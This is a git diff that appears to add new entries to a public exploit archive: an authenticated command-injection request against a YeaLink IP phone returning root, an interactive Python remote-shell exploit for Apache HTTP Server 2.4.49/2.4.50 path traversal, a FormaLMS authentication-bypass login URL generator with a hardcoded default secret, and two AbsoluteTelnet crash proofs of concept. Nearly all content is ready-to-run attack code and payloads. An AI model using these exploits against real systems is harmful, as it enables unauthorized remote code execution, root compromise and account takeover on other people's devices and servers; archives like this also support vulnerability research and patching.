diff --git a/exploits/hardware/webapps/50509.txt b/exploits/hardware/webapps/50509.txt
new file mode 100644
index 000000000..ce3279ee6
--- /dev/null
+++ b/exploits/hardware/webapps/50509.txt
@@ -0,0 +1,44 @@
+# Exploit Title: YeaLink SIP-TXXXP 53.84.0.15 - 'cmd' Command Injection (Authenticated)
+# Date: 11-10-2021
+# Exploit Author: tahaafarooq
+# Vendor Homepage: https://www.yealink.com/
+# Version: 53.84.0.15
+# Tested on: YeaLink IP Phone SIP-T19P (Hadrware VOIP Phone)
+
+Description:
+
+Using Diagnostic tool from the Networking Tab to perform a Ping or Traceroute , to perform OS command injection
+
+POC:
+
+POST /servlet?m=mod_data&p=network-diagnosis&q=docmd&Rajax=0.890925468511929 HTTP/1.1
+Host: xxx.xxx.xxx.xxx
+Content-Length: 49
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Accept: */*
+Origin: http://xxx.xxx.xxx.xxx
+Referer: http://xxx.xxx.xxx.xxx/servlet?m=mod_data&p=network-diagnosis&q=load
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: JSESSIONID=9a83d24461329a130
+Connection: close
+
+cmd=; id;&token=1714636915c6acea98
+
+-------------------------------------------------
+
+HTTP/1.1 200 OK
+Content-Type: text/html
+Connection: close
+Date: Wed, 10 Nov 2021 14:20:23 GMT
+Server: embed httpd
+Content-Length: 82
+
+
+
+
+ uid=0(root) gid=0(root)
+
+
+
\ No newline at end of file
diff --git a/exploits/multiple/webapps/50512.py b/exploits/multiple/webapps/50512.py
new file mode 100755
index 000000000..3f6971971
--- /dev/null
+++ b/exploits/multiple/webapps/50512.py
@@ -0,0 +1,121 @@
+# Exploit Title: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3)
+# Date: 11/11/2021
+# Exploit Author: Valentin Lobstein
+# Vendor Homepage: https://apache.org/
+# Software Link: https://github.com/Balgogan/CVE-2021-41773
+# Version: Apache 2.4.49/2.4.50 (CGI enabled)
+# Tested on: Debian GNU/Linux
+# CVE : CVE-2021-41773 / CVE-2021-42013
+# Credits : Lucas Schnell
+
+
+#!/usr/bin/env python3
+#coding: utf-8
+
+import os
+import re
+import sys
+import time
+import requests
+from colorama import Fore,Style
+
+
+header = '''\033[1;91m
+
+ ▄▄▄ ██▓███ ▄▄▄ ▄████▄ ██░ ██ ▓█████ ██▀███ ▄████▄ ▓█████
+ ▒████▄ ▓██░ ██▒▒████▄ ▒██▀ ▀█ ▓██░ ██▒▓█ ▀ ▓██ ▒ ██▒▒██▀ ▀█ ▓█ ▀
+ ▒██ ▀█▄ ▓██░ ██▓▒▒██ ▀█▄ ▒▓█ ▄ ▒██▀▀██░▒███ ▓██ ░▄█ ▒▒▓█ ▄ ▒███
+ ░██▄▄▄▄██ ▒██▄█▓▒ ▒░██▄▄▄▄██ ▒▓▓▄ ▄██▒░▓█ ░██ ▒▓█ ▄ ▒██▀▀█▄ ▒▓▓▄ ▄██▒▒▓█ ▄
+ ▓█ ▓██▒▒██▒ ░ ░ ▓█ ▓██▒▒ ▓███▀ ░░▓█▒░██▓░▒████▒ ░██▓ ▒██▒▒ ▓███▀ ░░▒████▒
+ ▒▒ ▓▒█░▒▓▒░ ░ ░ ▒▒ ▓▒█░░ ░▒ ▒ ░ ▒ ░░▒░▒░░ ▒░ ░ ░ ▒▓ ░▒▓░░ ░▒ ▒ ░░░ ▒░ ░
+ ▒ ▒▒ ░░▒ ░ ▒ ▒▒ ░ ░ ▒ ▒ ░▒░ ░ ░ ░ ░ ░▒ ░ ▒░ ░ ▒ ░ ░ ░
+ ░ ▒ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ ░ ░
+''' + Style.RESET_ALL
+
+
+if len(sys.argv) < 2 :
+ print( 'Use: python3 file.py ip:port ' )
+ sys.exit()
+
+def end():
+ print("\t\033[1;91m[!] Bye bye !")
+ time.sleep(0.5)
+ sys.exit(1)
+
+def commands(url,command,session):
+ directory = mute_command(url,'pwd')
+ user = mute_command(url,'whoami')
+ hostname = mute_command(url,'hostname')
+ advise = print(Fore.YELLOW + 'Reverse shell is advised (This isn\'t an interactive shell)')
+ command = input(f"{Fore.RED}╭─{Fore.GREEN + user}@{hostname}: {Fore.BLUE + directory}\n{Fore.RED}╰─{Fore.YELLOW}$ {Style.RESET_ALL}")
+ command = f"echo; {command};"
+ req = requests.Request('POST', url=url, data=command)
+ prepare = req.prepare()
+ prepare.url = url
+ response = session.send(prepare, timeout=5)
+ output = response.text
+ print(output)
+ if 'clear' in command:
+ os.system('/usr/bin/clear')
+ print(header)
+ if 'exit' in command:
+ end()
+
+def mute_command(url,command):
+ session = requests.Session()
+ req = requests.Request('POST', url=url, data=f"echo; {command}")
+ prepare = req.prepare()
+ prepare.url = url
+ response = session.send(prepare, timeout=5)
+ return response.text.strip()
+
+
+def exploitRCE(payload):
+ s = requests.Session()
+ try:
+ host = sys.argv[1]
+ if 'http' not in host:
+ url = 'http://'+ host + payload
+ else:
+ url = host + payload
+ session = requests.Session()
+ command = "echo; id"
+ req = requests.Request('POST', url=url, data=command)
+ prepare = req.prepare()
+ prepare.url = url
+ response = session.send(prepare, timeout=5)
+ output = response.text
+ if "uid" in output:
+ choice = "Y"
+ print( Fore.GREEN + '\n[!] Target %s is vulnerable !!!' % host)
+ print("[!] Sortie:\n\n" + Fore.YELLOW + output )
+ choice = input(Fore.CYAN + "[?] Do you want to exploit this RCE ? (Y/n) : ")
+ if choice.lower() in ['','y','yes']:
+ while True:
+ commands(url,command,session)
+ else:
+ end()
+ else :
+ print(Fore.RED + '\nTarget %s isn\'t vulnerable' % host)
+ except KeyboardInterrupt:
+ end()
+
+def main():
+ try:
+ apache2449_payload = '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash'
+ apache2450_payload = '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash'
+ payloads = [apache2449_payload,apache2450_payload]
+ choice = len(payloads) + 1
+ print(header)
+ print("\033[1;37m[0] Apache 2.4.49 RCE\n[1] Apache 2.4.50 RCE")
+ while choice >= len(payloads) and choice >= 0:
+ choice = int(input('[~] Choice : '))
+ if choice < len(payloads):
+ exploitRCE(payloads[choice])
+ except KeyboardInterrupt:
+ print("\n\033[1;91m[!] Bye bye !")
+ time.sleep(0.5)
+ sys.exit(1)
+
+if __name__ == '__main__':
+ main()
\ No newline at end of file
diff --git a/exploits/multiple/webapps/50513.py b/exploits/multiple/webapps/50513.py
new file mode 100755
index 000000000..66fea3c3e
--- /dev/null
+++ b/exploits/multiple/webapps/50513.py
@@ -0,0 +1,51 @@
+# Exploit Title: FormaLMS 2.4.4 - Authentication Bypass
+# Google Dork: inurl:index.php?r=adm/
+# Date: 2021-11-10
+# Exploit Author: Cristian 'void' Giustini @ Hacktive Security
+# Vendor Homepage: https://formalms.org
+# Software Link: https://formalms.org
+# Version: <= 2.4.4
+# Tested on: Linux
+# CVE : CVE-2021-43136
+
+# Info: An authentication bypass issue in FormaLMS <= 2.4.4 allows an attacker to bypass the authentication mechanism and obtain a valid access to the platform.
+
+# Analysis:
+https://blog.hacktivesecurity.com/index.php/2021/10/05/cve-2021-43136-formalms-the-evil-default-value-that-leads-to-authentication-bypass/
+
+# Nuclei template:
+https://gist.github.com/hacktivesec/d2160025d24c5689d1bc60173914e004#file-formalms-authbypass-yaml
+
+#!/usr/bin/env python
+
+"""
+
+The following exploit generates two URLs with empty and fixed value of the "secret". In order to achieve a successful exploitation the "Enable SSO with a third party software through a token" setting needs to be enabled
+
+"""
+
+import sys
+import time
+import hashlib
+
+secret = "8ca0f69afeacc7022d1e589221072d6bcf87e39c"
+
+ def help():
+
+ print(f"Usage: {sys.argv[0]} username target_url")
+
+ sys.exit()
+
+
+if len(sys.argv) < 3:
+
+ help()
+
+user, url = (sys.argv[1], sys.argv[2])
+t = str(int(time.time()) + 5000)
+token = hashlib.md5(f"{user},{t},{secret}".encode()).hexdigest().upper()
+final_url = f"{url}/index.php?login_user={user}&time={t}&token={token}"
+print(f"URL with default secret: {final_url}")
+token = hashlib.md5(f"{user},{t},".encode()).hexdigest().upper()
+final_url = f"{url}/index.php?login_user={user}&time={t}&token={token}"
+print(f"URL with empty secret: {final_url}")
\ No newline at end of file
diff --git a/exploits/windows/dos/50510.py b/exploits/windows/dos/50510.py
new file mode 100755
index 000000000..60cd08922
--- /dev/null
+++ b/exploits/windows/dos/50510.py
@@ -0,0 +1,37 @@
+# Exploit Title: AbsoluteTelnet 11.24 - 'Username' Denial of Service (PoC)
+# Discovered by: Yehia Elghaly
+# Discovered Date: 2021-11-10
+# Vendor Homepage: https://www.celestialsoftware.net/
+# Software Link: https://www.celestialsoftware.net/telnet/AbsoluteTelnet32.11.24.exe
+# Tested Version: 11.24
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 7 Professional x86 SP1 - Windows 10 x64
+
+# Description: AbsoluteTelnet 11.24 - 'SHA1/SHA2/Username' and 'Error Report' Denial of Service (PoC)
+
+# Steps to reproduce:
+# 1. - Download and install AbsoluteTelnet
+# 2. - Run the python script and it will create exploit.txt file.
+# 3. - Open AbsoluteTelnet 11.24
+# 4. - "new connection file -> Connection -> SSH1 & SSH2"
+# 5. - Paste the characters of txt file to "Authentication -> Username"
+# 6. - press "ok" button
+# 7. - Crashed
+# 8. - Reopen AbsoluteTelnet 11.24
+# 9. - Copy the same characters to "Your Email Address (optional)"
+# 10.- Click "Send Error Report" button
+# 11.- Crashed
+
+
+#!/usr/bin/python
+
+exploit = 'A' * 1000
+
+try:
+ file = open("exploit.txt","w")
+ file.write(exploit)
+ file.close()
+
+ print("POC is created")
+except:
+ print("POC not created")
\ No newline at end of file
diff --git a/exploits/windows/dos/50511.py b/exploits/windows/dos/50511.py
new file mode 100755
index 000000000..c5c29e6e2
--- /dev/null
+++ b/exploits/windows/dos/50511.py
@@ -0,0 +1,36 @@
+# Exploit Title: AbsoluteTelnet 11.24 - 'Phone' Denial of Service (PoC)
+# Discovered by: Yehia Elghaly
+# Discovered Date: 2021-11-10
+# Vendor Homepage: https://www.celestialsoftware.net/
+# Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet32.11.24.exe
+# Tested Version: 11.24
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 7 Professional x86 SP1 - Windows 10 x64
+
+# Description: AbsoluteTelnet 11.24 - 'DialUp/Phone' & license name Denial of Service (PoC)
+
+# Steps to reproduce:
+# 1. - Download and install AbsoluteTelnet
+# 2. - Run the python script and it will create exploit.txt file.
+# 3. - Open AbsoluteTelnet 11.24
+# 4. - "new connection file -> DialUp Connection
+# 5. - Paste the characters of txt file to "DialUp -> phone"
+# 6. - press "ok" button
+# 7. - Crashed
+# 8. - Reopen AbsoluteTelnet 11.24
+# 9. - Copy the same characters to "license name"
+# 10.- Click "Send Error Report" button
+# 11.- Crashed
+
+#!/usr/bin/python
+
+exploit = 'A' * 1000
+
+try:
+ file = open("exploit.txt","w")
+ file.write(exploit)
+ file.close()
+
+ print("POC is created")
+except:
+ print("POC not created")
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 54c19dd63..b85795061 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6803,6 +6803,8 @@ id,file,description,date,author,type,platform,port
50322,exploits/windows/dos/50322.py,"Redragon Gaming Mouse - 'REDRAGON_MOUSE.sys' Denial of Service (PoC)",1970-01-01,"Quadron Research Lab",dos,windows,
50433,exploits/windows/dos/50433.py,"NIMax 5.3.1 - 'Remote VISA System' Denial of Service (PoC)",1970-01-01,LinxzSec,dos,windows,
50434,exploits/windows/dos/50434.py,"NIMax 5.3.1f0 - 'VISA Alias' Denial of Service (PoC)",1970-01-01,LinxzSec,dos,windows,
+50510,exploits/windows/dos/50510.py,"AbsoluteTelnet 11.24 - 'Username' Denial of Service (PoC)",1970-01-01,"Yehia Elghaly",dos,windows,
+50511,exploits/windows/dos/50511.py,"AbsoluteTelnet 11.24 - 'Phone' Denial of Service (PoC)",1970-01-01,"Yehia Elghaly",dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",1970-01-01,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",1970-01-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",1970-01-01,KuRaK,local,linux,
@@ -44606,3 +44608,6 @@ id,file,description,date,author,type,platform,port
50505,exploits/php/webapps/50505.py,"FusionPBX 4.5.29 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,Luska,webapps,php,
50506,exploits/php/webapps/50506.txt,"Employee Daily Task Management System 1.0 - 'Name' Stored Cross-Site Scripting (XSS)",1970-01-01,"Ragavender A G",webapps,php,
50507,exploits/php/webapps/50507.txt,"Employee and Visitor Gate Pass Logging System 1.0 - 'name' Stored Cross-Site Scripting (XSS)",1970-01-01,"İlhami Selamet",webapps,php,
+50509,exploits/hardware/webapps/50509.txt,"YeaLink SIP-TXXXP 53.84.0.15 - 'cmd' Command Injection (Authenticated)",1970-01-01,tahaafarooq,webapps,hardware,
+50512,exploits/multiple/webapps/50512.py,"Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3)",1970-01-01,"Valentin Lobstein",webapps,multiple,
+50513,exploits/multiple/webapps/50513.py,"FormaLMS 2.4.4 - Authentication Bypass",1970-01-01,"Cristian \'void\' Giustini",webapps,multiple,